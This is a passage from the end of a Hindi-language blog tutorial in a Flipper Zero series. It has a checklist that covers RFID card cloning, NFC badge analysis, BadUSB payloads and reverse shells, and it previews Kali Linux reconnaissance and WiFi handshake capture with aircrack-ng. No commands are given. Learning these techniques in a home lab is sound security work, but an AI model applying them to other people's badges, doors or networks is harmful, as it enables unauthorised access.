भाग 2 चेकलिस्ट

☐ Sub-GHz: गैराज के दरवाजे का विश्लेषण किया, रोलिंग बनाम स्टैटिक कोड समझे

☐ 125kHz RFID: कार्ड पढ़े, कम से कम एक क्लोन परीक्षण किया

☐ NFC: वर्क बैज का विश्लेषण किया, कार्ड प्रकार पहचाना

☐ Infrared: पूरी होम रिमोट लाइब्रेरी बनाई

☐ BadUSB: सिस्टम इन्फो पेलोड परीक्षण किया, रिवर्स शेल समझा

☐ GPIO: भाग 3 के लिए WiFi dev board तैयार

☐ Magic Cards: परीक्षण के लिए T5577 और/या NFC मैजिक कार्ड प्राप्त किए

फ्लिपर महारत कार्य योजना 0/6

आगे क्या है

भाग 3 में, हम फ्लिपर की केंद्रित क्षमताओं को छोड़कर पूर्ण पेनेट्रेशन टेस्टिंग वातावरण में प्रवेश करते हैं: Kali Linux

आप सीखेंगे:

  • अपनी हैकिंग प्रयोगशाला स्थापित करना (VM इंस्टॉलेशन और कॉन्फ़िगरेशन)
  • nmap के साथ नेटवर्क रिकॉनेसेंस जो आपके नेटवर्क पर हर डिवाइस को मैप करता है
  • वायरलेस रिकॉनेसेंस जिसमें aircrack-ng से WiFi हैंडशेक कैप्चर करना शामिल है
  • वेब रिकॉनेसेंस जिसमें यह पता लगाना है कि आपका राउटर क्या उजागर करता है
  • फ्लिपर कैप्चर को Kali वर्कफ्लो से जोड़ना

फ्लिपर ने आपको दिखाया कि कमजोरियां मौजूद हैं। Kali आपको यह समझने में मदद करता है कि वे कितनी गहरी हैं।

भाग 3 में मिलते हैं।

How was this article?

साझा करें

Link copied to clipboard!

You Might Also Like

Lee Foropoulos

Lee Foropoulos

Business Development Lead at Lookatmedia, fractional executive, and founder of gotHABITS.

🔔

Koi bhi post na chookeN

Naye lekh prakashit hone par suchna prapt kareN. Email ki zaroorat nahiN.

Nayi post hone par site par ek banner dikhega, aur browser notification bhi agar aap anumati dete hain.

Keval browser soochnaeN. Koi spam nahiN.

0 / 0